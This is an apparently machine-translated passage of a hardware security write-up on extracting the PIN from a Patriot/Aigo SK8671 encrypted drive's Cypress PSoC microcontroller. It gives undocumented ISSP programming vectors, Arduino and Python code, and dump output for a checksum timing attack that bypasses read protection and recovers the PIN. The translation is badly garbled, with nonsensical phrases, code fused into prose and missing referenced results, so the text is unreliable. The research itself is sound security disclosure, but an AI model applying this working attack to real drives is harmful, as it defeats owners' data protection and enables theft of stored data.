ʻO kēia ka ʻāpana ʻelua a me ka hope o ka ʻatikala e pili ana i ka hacking external self-encrypting drive. E hoʻomanaʻo wau iā ʻoe ua lawe mai kekahi hoa hana iaʻu i kahi Patriot (Aigo) SK8671 paʻakikī, a ua hoʻoholo wau e hoʻohuli, a i kēia manawa ke kaʻana nei au i ka mea i puka mai. Ma mua o ka heluhelu ʻana, e ʻoluʻolu e heluhelu ʻatikala.
4. Hoʻomaka mākou e lawe i kahi pahu mai ka PSoC flash drive
No laila, hōʻike nā mea a pau (e like me kā mākou i hoʻokumu ai ma [ka hapa mua] ()) e mālama ʻia ka code PIN i ka hohonu o ka PSoC. No laila, pono mākou e heluhelu i kēia mau hohonu uila. Ma mua o ka hana pono:
- e hoʻomalu i ka "kamaʻilio" me ka microcontroller;
- e huli i kahi ala e nānā ai inā palekana kēia "kamaʻilio" mai ka heluhelu ʻana mai waho;
- e imi i ala e kaalo ai i ka pale.
ʻElua mau wahi kūpono e ʻimi ai i kahi code PIN kūpono:
- hoʻomanaʻo uila i loko;
- SRAM, kahi e mālama ʻia ai ke code pin e hoʻohālikelike ai me ke code pin i hoʻokomo ʻia e ka mea hoʻohana.
Ke nānā nei i mua, e hoʻomaopopo wau ua hiki iaʻu ke lawe i kahi pahu o ka PSoC flash drive - ke kaʻe ʻana i kāna ʻōnaehana palekana me ka hoʻohana ʻana i kahi hoʻouka kaua i kapa ʻia ʻo "cold boot tracing" - ma hope o ka hoʻohuli ʻana i nā mana undocumented o ka protocol ISSP. Ua ʻae kēia iaʻu e hoʻolei pololei i ka code PIN maoli.
$ ./psoc.py
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9Code papahana hope:
- ;
- .
5. ʻO ka protocol ISSP
5.1. He aha ka ISSP
Hiki ke ʻano like ʻole ka "kamaʻilio" me kahi microcontroller: mai ka "mea kūʻai aku i ka mea kūʻai aku" i ka launa pū ʻana me ka protocol serial (no ka laʻana, ICSP no ka Microchip's PIC).
Loaʻa i ka Cypress kāna protocol proprietary no kēia, i kapa ʻia ʻo ISSP (in-system serial programming protocol), i wehewehe ʻia i loko . hāʻawi pū kekahi ʻike. Aia kekahi OpenSource like i kapa ʻia ʻo HSSP (e hoʻohana mākou iā ia ma hope iki). Ke hana nei ka ISSP penei:
- hoʻomaka hou i ka PSoC;
- e hoʻopuka i ka helu kilokilo i ka pine data serial o kēia PSoC; e hoʻokomo i ke ʻano papahana waho;
- hoʻouna i nā kauoha, ʻo ia nā kaula liʻiliʻi i kapa ʻia ʻo "vectors".
Hōʻike ka palapala ISSP i kēia mau vectors no kahi liʻiliʻi liʻiliʻi o nā kauoha:
- Hoʻomaka-1
- Hoʻomaka-2
- Hoʻomaka-3 (nā koho 3V a me 5V)
- ID-SETUP
- HELUHELU-ID-WORD
- SET-BLOCK-NUM: 10011111010dddddddd111, kahi dddddddd=block #
- HOOMELE PUU
- PALAKAI-PAKA
- VERIFY-SETUP
- READ-BYTE: 10110aaaaaZDDDDDDDDDDZ1, kahi DDDDDDDD = ʻikepili i waho, aaaaaa = helu wahi (6 bits)
- WRITE-BYTE: 10010aaaaaaddddddd111, kahi dddddddd = data i loko, aaaaaa = helu wahi (6 bits)
- KA HOʻOKE
- KA HOʻOMAʻI-HOʻOMAʻI
- READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1, kahi DDDDDDDDDDDDDDDDDD = ʻikepili i waho: hōʻike manaʻo.
- PALAKI HOOMELE
No ka laʻana, ka vector no Initialize-2:
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111Ua like ka lōʻihi o nā vectors a pau: 22 bits. Aia i ka palapala HSSP kekahi mau ʻike hou aku ma ISSP: "ʻO kahi vector ISSP he mea ʻē aʻe ma mua o kahi kaʻina liʻiliʻi e hōʻike ana i kahi pūʻulu kuhikuhi."
5.2. Nā Vectors Hoʻokaʻawale
E noʻonoʻo kākou i ka mea e hana nei. I ka hoʻomaka ʻana, manaʻo wau ʻo kēia mau vectors nā mana o nā ʻōlelo kuhikuhi M8C, akā ma hope o ka nānā ʻana i kēia kuhiakau, ʻike wau ʻaʻole i kūlike nā opcodes o nā hana.
A laila huli au i ka vector ma luna a ʻike ʻO kahi haʻawina kahi o ka mea kākau, ʻoiai ʻaʻole ʻo ia e hele i nā kikoʻī, hāʻawi i kekahi mau ʻōlelo aʻoaʻo: "E hoʻomaka kēlā me kēia ʻōlelo aʻo me ʻekolu mau bits e pili ana i kekahi o nā mnemonics ʻehā (heluhelu mai RAM, kākau iā RAM, heluhelu kākau inoa, kākau inoa). A laila aia he 8 mau ʻāpana helu, a ukali ʻia e 8 mau ʻikepili (heluhelu a kākau paha) a ma hope ʻekolu mau ʻāpana hoʻomaha.
A laila ua hiki iaʻu ke hōʻiliʻili i kekahi ʻike pono loa mai ka ʻāpana Supervisory ROM (SROM). . ʻO SROM kahi ROM paʻa i loko o ka PSoC e hāʻawi ana i nā hana pono (ma ke ʻano like me Syscall) no ka code program e holo ana ma kahi o ka mea hoʻohana:
- 00h:SWBootReset
- 01h: ReadBlock
- 02h: WriteBlock
- 03h: Holoi Pale
- 06h: Heluhelu Papa
- 07h: Ka helu helu
- 08h: Kalibrate0
- 09h: Kalibrate1
Ma ka hoʻohālikelike ʻana i nā inoa vector i nā hana SROM, hiki iā mākou ke palapala i nā hana like ʻole i kākoʻo ʻia e kēia protocol i nā ʻāpana SROM i manaʻo ʻia. Mahalo i kēia, hiki iā mākou ke hoʻokaʻawale i nā ʻāpana mua ʻekolu o nā vectors ISSP:
- 100 => “wrem”
- 101 => “ʻo ia hoʻi”
- 110 => “wrreg”
- 111 => “ʻoi aku”
Eia naʻe, hiki ke loaʻa ka ʻike piha o nā kaʻina hana on-chip ma o ke kamaʻilio pololei ʻana me ka PSoC.
5.3. Kūkākūkā me PSoC
ʻOiai ua loaʻa iā Dirk Petrautsky ʻO Cypress's HSSP code ma Arduino, ua hoʻohana au iā Arduino Uno e hoʻopili i ka mea hoʻohui ISSP o ka papa keyboard.
E ʻoluʻolu, i ka wā o kaʻu noiʻi ʻana, ua hoʻololi iki au i ke code a Dirk. Hiki iā ʻoe ke ʻike i kaʻu hoʻololi ma GitHub: a me ka palapala Python e pili ana no ke kamaʻilio ʻana me Arduino, ma kaʻu waihona .
No laila, me ka hoʻohana ʻana iā Arduino, ua hoʻohana mua wau i nā vectors "official" no ka "kamaʻilio". Ua hoʻāʻo wau e heluhelu i ka ROM kūloko me ka hoʻohana ʻana i ke kauoha VERIFY. E like me ka mea i manaʻo ʻia, ʻaʻole hiki iaʻu ke hana i kēia. Ma muli paha o ka ho'ā ʻia ʻana o nā bits palekana heluhelu i loko o ka flash drive.
A laila, hana wau i kekahi o kaʻu mau vectors maʻalahi no ke kākau ʻana a me ka heluhelu ʻana i ka hoʻomanaʻo / kākau inoa. E ʻoluʻolu e hiki iā mākou ke heluhelu i ka SROM holoʻokoʻa ʻoiai ua pale ʻia ka flash drive!
5.4. Ka ʻike ʻana o nā papa inoa ma luna o ka chip
Ma hope o ka nānā ʻana i nā vectors "disassembled", ʻike wau e hoʻohana ana ka hāmeʻa i nā palapala inoa ʻole (0xF8-0xFA) e kuhikuhi i nā opcodes M8C, i hoʻokō pololei ʻia, e kāpae ana i ka pale. Ua ʻae kēia iaʻu e holo i nā opcode like ʻole e like me "ADD", "MOV A, X", "PUSH" a i ʻole "JMP". Mahalo iā lākou (ma ka nānā ʻana i nā hopena ʻaoʻao i loaʻa iā lākou ma nā papa inoa) ua hiki iaʻu ke hoʻoholo i ka mea o nā papa inoa ʻole i kākau ʻia he mau papa inoa maʻamau (A, X, SP a me PC).
ʻO ka hopena, ʻo ke code "disassembled" i hana ʻia e ka mea hana HSSP_disas.rb e like me kēia (Ua hoʻohui au i nā manaʻo no ka maopopo):
--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00 # сброс флагов
[DE C0 1C] wrreg SP (f6), 0x00 # сброс SP
[9F 07 5C] wrmem KEY1, 0x3A # обязательный аргумент для SSC
[9F 20 7C] wrmem KEY2, 0x03 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00 # сброс PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03 # (LSB) ... до 3 ??
[9F 70 1C] wrmem POINTER, 0x80 # RAM-указатель для выходных данных
[DF 26 1C] wrreg opc1 (f9), 0x30 # Опкод 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40 # Опкод 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01 # BLOCK ID для вызова SSC
[DE 00 DC] wrreg A (f0), 0x06 # номер "Syscall" : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00 # Опкод для SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12 # Недокумментированная операция: выполнить внешний опкод
5.5. Nā ʻāpana palekana
I kēia manawa hiki iaʻu ke kamaʻilio pū me ka PSoC, akā ʻaʻohe oʻu ʻike hilinaʻi e pili ana i nā ʻāpana palekana o ka flash drive. Pīhoihoi loa au i ka hāʻawi ʻole ʻana o Cypress i ka mea hoʻohana i ka mea hoʻohana i kekahi ala e nānā ai inā hoʻāla ʻia ka pale. Ua ʻeli au i loko o Google no ka hoʻomaopopo hope ʻana ua hōʻano hou ʻia ka code HSSP i hāʻawi ʻia e Cypress ma hope o ka hoʻokuʻu ʻana o Dirk i kāna hoʻololi. A pēlā! Ua puka mai kēia vector hou:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # неизвестные аргументы
[9F E0 1C] wrmem 0xFF, 0x00 # аналогично
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10 # недокументированный syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Ke hoʻohana nei i kēia vector (e ʻike i ka read_security_data ma psoc.py), loaʻa iā mākou nā ʻāpana palekana āpau ma SRAM ma 0x80, kahi ʻelua ʻāpana no kēlā me kēia poloka pale.
He mea kaumaha ka hopena: pale ʻia nā mea a pau ma ke ʻano "disable waho heluhelu a me ke kākau ʻana". No laila, ʻaʻole hiki iā mākou ke heluhelu i kekahi mea mai ka flash drive, akā ʻaʻole hiki iā mākou ke kākau i kekahi mea (e laʻa, e hoʻokomo i kahi dumper ROM ma laila). A ʻo ke ala wale nō e hoʻopau ai i ka pale ʻana ʻo ka holoi ʻana i ka chip holoʻokoʻa. 🙁
6. ʻO ka hoʻouka kaua mua (hāʻule): ROMX
Eia nō naʻe, hiki iā mākou ke hoʻāʻo i kēia hoʻopunipuni: no ka mea hiki iā mākou ke hoʻokō i nā opcodes arbitrary, no ke aha e hoʻokō ʻole ai iā ROMX, i hoʻohana ʻia e heluhelu i ka hoʻomanaʻo flash? Loaʻa i kēia ala ka lanakila. No ka mea, ʻo ka hana ReadBlock e heluhelu ana i ka ʻikepili mai ka SROM (i hoʻohana ʻia e nā vectors) e nānā inā kāhea ʻia mai ka ISSP. Eia nō naʻe, ʻaʻole i loaʻa i ka ROMX opcode ka nānā ʻana. No laila eia ke code Python (ma hope o ka hoʻohui ʻana i kekahi mau papa kōkua i ke code Arduino):
for i in range(0, 8192):
write_reg(0xF0, i>>8) # A = 0
write_reg(0xF3, i&0xFF) # X = 0
exec_opcodes("x28x30x40") # ROMX, HALT, NOP
byte = read_reg(0xF0) # ROMX reads ROM[A|X] into A
print "%02x" % ord(byte[0]) # print ROM byteʻAʻole hoʻohana kēia code. 🙁 A i ʻole e hana ana, akā ma ka hopena e loaʻa iā mākou nā opcodes ponoʻī (0x28 0x30 0x40)! ʻAʻole wau i manaʻo ʻo ka hana kūpono o ka hāmeʻa he mea ia o ka pale heluhelu. ʻOi aku kēia me ka hoʻopunipuni ʻenekinia: i ka wā e hoʻokō ai i nā opcodes waho, hoʻihoʻi ʻia ke kaʻa ROM i kahi paʻa manawa.
7. Hoouka Elua: Ka Huhi Pua Anu
No ka holo ʻole o ka hoʻopunipuni ROMX, hoʻomaka wau e noʻonoʻo e pili ana i kahi ʻano ʻē aʻe o kēia hoʻopunipuni - i wehewehe ʻia ma ka paʻi .
7.1. Hoʻokō
Hāʻawi ka palapala ISSP i kēia vector no CHECKSUM-SETUP:
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Kāhea kēia i ka hana SROM 0x07, e like me ka mea i hōʻike ʻia ma ka palapala (italics mine):
ʻO kēia hana checksum hōʻoia. Heluhelu ia i ka helu helu 16-bit o ka helu o nā poloka i kuhikuhi ʻia e ka mea hoʻohana i hoʻokahi waihona flash, e hoʻomaka ana mai ka ʻole. Hoʻohana ʻia ka ʻāpana BLOCKID e hāʻawi i ka helu o nā poloka e hoʻohana ʻia i ka helu ʻana i ka checksum. ʻO ka waiwai o "1" e helu wale i ka helu helu no ka poloka zero; oiai "0" e helu ʻia ka huina helu helu o nā poloka 256 a pau o ka panakō uila. Hoʻihoʻi ʻia ka helu helu 16-bit ma o KEY1 a me KEY2. Mālama ka ʻāpana KEY1 i nā ʻāpana haʻahaʻa 8 o ka checksum, a mālama ka ʻāpana KEY2 i nā ʻāpana kiʻekiʻe he 8. No nā mea hana me nā panakō flash, ua kapa ʻia ka hana checksum no kēlā me kēia. Hoʻonohonoho ʻia ka helu panakō e hana ʻia e ka FLS_PR1 register (ma ka hoʻonohonoho ʻana i ka bit i loko e pili ana i ka waihona flash target).
E hoʻomaopopo he helu helu maʻalahi kēia: hoʻohui wale ʻia nā bytes ma hope o kekahi; ʻaʻohe quirks CRC nani. Eia kekahi, i ka ʻike ʻana he liʻiliʻi liʻiliʻi loa ka M8C core, ua manaʻo wau i ka helu ʻana i ka checksum, e hoʻopaʻa ʻia nā waiwai waena i nā ʻano like ʻole e hele i ka hopena: KEY1 (0xF8) / KEY2 ( 0xF9).
No laila, ma ke kumumanaʻo, ua like koʻu hoʻouka ʻana penei:
- Hoʻopili mākou ma o ISSP.
- Hoʻomaka mākou i ka helu checksum me ka hoʻohana ʻana i ka vector CHECKSUM-SETUP.
- Hoʻomaka hou mākou i ke kaʻina hana ma hope o ka manawa i kuhikuhi ʻia ʻo T.
- Heluhelu mākou iā RAM e kiʻi i ka checksum C.
- E hana hou i nā ʻanuʻu 3 a me 4, e hoʻonui liʻiliʻi iā T i kēlā me kēia manawa.
- Hoʻihoʻi mākou i ka ʻikepili mai kahi flash drive ma ka unuhi ʻana i ka checksum C mua mai ka mea i kēia manawa.
Eia nō naʻe, aia kahi pilikia: ʻo ka Initialize-1 vector e pono ai mākou e hoʻouna ma hope o ka reboot e hoʻopau iā KEY1 a me KEY2:
1100101000000000000000 # Магия, переводящая PSoC в режим программирования
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # контрольная сумма перезаписывается здесь
[9F 20 7C] wrmem KEY2, 0x03 # и здесь
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09 # SROM-функция 9
[DF 00 1C] wrreg opc0 (f8), 0x00 # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12Hoʻopau kēia code i kā mākou checksum makamae ma ke kāhea ʻana iā Calibrate1 (SROM function 9) ... Malia paha hiki iā mākou ke hoʻouna i ka helu kilokilo (mai ka hoʻomaka ʻana o ke code ma luna) e komo i ke ʻano papahana, a laila heluhelu i ka SRAM? A ʻae, hana ia! ʻO ke code Arduino e hoʻokō nei i kēia hoʻouka ʻana he maʻalahi loa ia:
case Cmnd_STK_START_CSUM:
checksum_delay = ((uint32_t)getch())<<24;
checksum_delay |= ((uint32_t)getch())<<16;
checksum_delay |= ((uint32_t)getch())<<8;
checksum_delay |= getch();
if(checksum_delay > 10000) {
ms_delay = checksum_delay/1000;
checksum_delay = checksum_delay%1000;
}
else {
ms_delay = 0;
}
send_checksum_v();
if(checksum_delay)
delayMicroseconds(checksum_delay);
delay(ms_delay);
start_pmode();- Heluhelu i ka checkum_delay.
- E holo i ka helu helu helu (send_checksum_v).
- E kali no kahi manawa i kuhikuhi ʻia; e noʻonoʻo ana i kēia mau pilikia:
- Ua hoʻopau wau i ka manawa nui a ʻike wau i ka hopena hana pololei wale nō me nā lohi ʻaʻole ma mua o 16383 μs;
- a laila pepehi hou i ka manawa like a hiki i koʻu ʻike ʻana i ka delayMicroseconds, inā hāʻawi ʻia ka 0 iā ia ma ke ʻano he hoʻokomo, hana hewa loa!
- Hoʻomaka hou i ka PSoC i ke ʻano papahana (hoʻouna wale mākou i ka helu kilokilo, me ka ʻole o ka hoʻouna ʻana i nā vectors initialization).
Ka helu hope ma Python:
for delay in range(0, 150000): # задержка в микросекундах
for i in range(0, 10): # количество считывания для каждойиз задержек
try:
reset_psoc(quiet=True) # перезагрузка и вход в режим программирования
send_vectors() # отправка инициализирующих векторов
ser.write("x85"+struct.pack(">I", delay)) # вычислить контрольную сумму + перезагрузиться после задержки
res = ser.read(1) # считать arduino ACK
except Exception as e:
print e
ser.close()
os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # открыть последовательный порт
continue
print "%05d %02X %02X %02X" % (delay, # считать RAM-байты
read_regb(0xf1),
read_ramb(0xf8),
read_ramb(0xf9))I ka pōkole, he aha ka hana a kēia code:
- Hoʻomaka hou i ka PSoC (a hoʻouna iā ia i kahi helu kilokilo).
- Hoʻouna i nā vector hoʻomaka piha.
- Kāhea i ka hana Arduino Cmnd_STK_START_CSUM (0x85), kahi i hala ai ka lohi i nā microseconds ma ke ʻano he ʻāpana.
- Heluhelu i ka checksum (0xF8 a me 0xF9) a me ka papa inoa ʻole 0xF1.
Hoʻokō ʻia kēia code 10 mau manawa i 1 microsecond. Hoʻokomo ʻia ʻo 0xF1 ma aneʻi no ka mea ʻo ia wale nō ka papa inoa i hoʻololi ʻia i ka helu ʻana i ka checksum. He ʻano hoʻololi manawaleʻa paha ia i hoʻohana ʻia e ka ʻāpana logic arithmetic. E hoʻomaopopo i ka hack maikaʻi ʻole aʻu e hoʻohana ai e hoʻonohonoho hou i ka Arduino me ka hoʻohana ʻana i ka picocom ke pau ka Arduino i ka hōʻike ʻana i nā hōʻailona o ke ola (ʻaʻohe manaʻo no ke aha).
7.2. Heluhelu i ka hopena
ʻO ka hopena o ka palapala Python e like me kēia (maʻalahi no ka heluhelu ʻana):
DELAY F1 F8 F9 # F1 – вышеупомянутый неизвестный регистр
# F8 младший байт контрольной суммы
# F9 старший байт контрольной суммы
00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00 # контрольная сумма сбрасывается в 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00 # 1-й байт: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00 # 2-й байт: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01 # понятия не имею, что здесь происходит
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00 # Снова E7?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00 # Хмммммм
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01 # А, дошло! Вот он же перенос в старший байт
00063 01 17 01
[...]
00075 CC 17 01 # Итак, 0x117-0xE7: 0x30ʻO ka ʻōlelo ʻana, pilikia mākou: ʻoiai ke hana nei mākou me kahi checksum maoli, ʻaʻole hoʻololi ka null byte i ka helu heluhelu. Eia nō naʻe, ʻoiai ʻo ke kaʻina hana helu holoʻokoʻa (8192 bytes) e lawe i 0,1478 kekona (me nā ʻano liʻiliʻi i kēlā me kēia manawa e holo ai), e like ana me 18,04 μs i kēlā me kēia byte, hiki iā mākou ke hoʻohana i kēia manawa e nānā i ka waiwai checksum i nā manawa kūpono. No nā holo mua, heluhelu maʻalahi nā mea a pau, ʻoiai ʻo ka lōʻihi o ke kaʻina hana helu ʻaneʻane like. Eia naʻe, ʻaʻole pololei ka hopena o kēia hoʻolei ʻana no ka mea ʻoi aku ka nui o nā "ʻokoʻa manawa liʻiliʻi" i kēlā me kēia holo.
134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DDʻO ia ka 10 dumps no kēlā me kēia microsecond lohi. ʻO ka nui o ka manawa hana no ka hoʻolei ʻana i nā 8192 bytes o kahi flash drive ma kahi o 48 mau hola.
7.3. ʻO ka hana hou ʻana o ka binary flash
ʻAʻole wau i hoʻopau i ke kākau ʻana i ke code e kūkulu hou i ka code program o ka flash drive, me ka noʻonoʻo ʻana i nā manawa āpau. Eia naʻe, ua hoʻihoʻi hou au i ka hoʻomaka o kēia code. No ka hōʻoia ʻana ua hana pololei wau, wehe wau me ka hoʻohana ʻana iā m8cdis:
0000: 80 67 jmp 0068h ; Reset vector
[...]
0068: 71 10 or F,010h
006a: 62 e3 87 mov reg[VLT_CR],087h
006d: 70 ef and F,0efh
006f: 41 fe fb and reg[CPU_SCR1],0fbh
0072: 50 80 mov A,080h
0074: 4e swap A,SP
0075: 55 fa 01 mov [0fah],001h
0078: 4f mov X,SP
0079: 5b mov A,X
007a: 01 03 add A,003h
007c: 53 f9 mov [0f9h],A
007e: 55 f8 3a mov [0f8h],03ah
0081: 50 06 mov A,006h
0083: 00 ssc
[...]
0122: 18 pop A
0123: 71 10 or F,010h
0125: 43 e3 10 or reg[VLT_CR],010h
0128: 70 00 and F,000h ; Paging mode changed from 3 to 0
012a: ef 62 jacc 008dh
012c: e0 00 jacc 012dh
012e: 71 10 or F,010h
0130: 62 e0 02 mov reg[OSC_CR0],002h
0133: 70 ef and F,0efh
0135: 62 e2 00 mov reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff jmp 013bh
013d: 50 08 mov A,008h
013f: 7f retHe mea kūpono loa!
7.4. Ke ʻimi nei i ka helu wahi mālama code PIN
I kēia manawa hiki iā mākou ke heluhelu i ka checksum i nā manawa a mākou e pono ai, hiki iā mākou ke nānā maʻalahi pehea a me kahi e loli ai ke:
- komo i ka helu PIN hewa;
- hoʻololi i ke code pin.
ʻO ka mea mua, no ka ʻimi ʻana i ka helu wahi e waiho ai, ua lawe au i kahi checksum dump ma 10 ms increments ma hope o ka reboot. A laila ua komo au i ka PIN hewa a hana like.
ʻAʻole ʻoluʻolu loa ka hopena, ʻoiai ua nui nā loli. Akā i ka hopena ua hiki iaʻu ke hoʻoholo ua loli ka checksum ma waena o 120000 µs a me 140000 µs o ka lohi. Akā ʻaʻole pololei ka "pincode" aʻu i hōʻike ai ma laila - ma muli o kahi mea hana o ka delayMicroseconds kaʻina hana, e hana ana i nā mea ʻē ke hāʻawi ʻia ʻo 0 iā ia.
A laila, ma hope o ka hoʻolilo ʻana i kahi kokoke i 3 mau hola, hoʻomanaʻo wau ua loaʻa i ka ʻōnaehana SROM kelepona ʻo CheckSum kahi hoʻopaʻapaʻa ma ke ʻano he hoʻokomo e kuhikuhi ana i ka helu o nā poloka no ka checksum! ʻO kēlā. hiki iā mākou ke hoʻonohonoho maʻalahi i ka helu wahi mālama o ka PIN code a me ka counter "incorrect attempts", me ka pololei a hiki i kahi poloka 64-byte.
ʻO kaʻu mau holo mua i loaʻa i kēia hopena:
A laila hoʻololi au i ka code PIN mai "123456" i "1234567" a loaʻa:
No laila, ua mālama ʻia ka code PIN a me ka counter of incorrect hoʻāʻo ʻana ma ka poloka No. 126.
7.5. Ka lawe ʻana i kahi hoʻolei o ka poloka No. 126
Pono ka poloka #126 ma kahi o 125x64x18 = 144000μs, mai ka hoʻomaka ʻana o ka helu checksum, i loko o kaʻu dump piha, a he mea kūpono loa ia. A laila, ma hope o ka kānana lima ʻana i nā dumps hewa ʻole (ma muli o ka hōʻiliʻili ʻana o nā "mea liʻiliʻi manawa liʻiliʻi"), ua loaʻa iaʻu kēia mau bytes (ma kahi latency o 145527 μs):
He mea maopopo loa ua mālama ʻia ke code PIN ma ke ʻano i hoʻopili ʻole ʻia! ʻO kēia mau waiwai, ʻoiaʻiʻo, ʻaʻole i kākau ʻia i nā code ASCII, akā e like me ka mea i ʻike ʻia, hōʻike lākou i nā heluhelu i lawe ʻia mai ka capacitive keyboard.
ʻO ka hope, ua holo au i kekahi mau hoʻāʻo hou aʻe e ʻike i kahi i mālama ʻia ai ka counter hoʻāʻo maikaʻi ʻole. Eia ka hopena:
0xFF - 'o ia ho'i "15 ho'ā'o" a emi iho me kēlā me kēia ho'ā'o 'ole.
7.6. Hoʻihoʻi hou i ka helu PIN
Eia kaʻu code ʻino e hoʻohui i nā mea i luna:
def dump_pin():
pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
last_csum = 0
pin_bytes = []
for delay in range(145495, 145719, 16):
csum = csum_at(delay, 1)
byte = (csum-last_csum)&0xFF
print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
pin_bytes.append(byte)
last_csum = csum
print "PIN: ",
for i in range(0, len(pin_bytes)):
if pin_bytes[i] in pin_map:
print pin_map[pin_bytes[i]],
printEia ka hopena o kāna hana ʻana.
$ ./psoc.py
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9Hooray! Hana!
E ʻoluʻolu e pili ana nā waiwai latency aʻu i hoʻohana ai i hoʻokahi PSoC kikoʻī - ka mea aʻu i hoʻohana ai.
8. He aha ka hope?
No laila, e hōʻuluʻulu mākou ma ka ʻaoʻao PSoC, ma ke ʻano o kā mākou Aigo drive:
- hiki iā mākou ke heluhelu i ka SRAM inā ua heluhelu ʻia i pale ʻia;
- Hiki iā mākou ke kāʻalo i ka pale anti-swipe me ka hoʻohana ʻana i kahi hoʻouka kaua wāwae anu a heluhelu pololei i ka code PIN.
Eia nō naʻe, loaʻa i kā mākou hoʻouka kekahi mau hemahema ma muli o nā pilikia synchronization. Hiki ke hoʻomaikaʻi ʻia penei:
- e kākau i kahi pono e hoʻokaʻawale pololei i ka ʻikepili puka i loaʻa ma muli o kahi hoʻouka kaua "cold boot trace";
- e hoʻohana i kahi hāmeʻa FPGA no ka hana ʻana i nā lohi o ka manawa pololei (a i ʻole e hoʻohana i nā timers hardware Arduino);
- e hoʻāʻo hou i kahi hoʻouka kaua: e hoʻokomo i kahi code PIN i kuhi hewa ʻole, reboot a hoʻolei i ka RAM, me ka manaʻo e mālama ʻia ke code PIN pololei i ka RAM no ka hoʻohālikelike. Eia naʻe, ʻaʻole maʻalahi kēia hana ma Arduino, no ka mea, ʻo ka pae hōʻailona Arduino he 5 volts, ʻoiai ka papa a mākou e nānā nei e hana me nā hōʻailona 3,3 volt.
ʻO kahi mea hoihoi e hiki ke hoʻāʻo ʻia ʻo ia ke pāʻani me ka pae uila e kāpae i ka pale heluhelu. Inā hana kēia ala, hiki iā mākou ke kiʻi i ka ʻikepili pololei mai ka flash drive - ma kahi o ka hilinaʻi ʻana i ka heluhelu ʻana i kahi checksum me nā lohi o ka manawa kūpono ʻole.
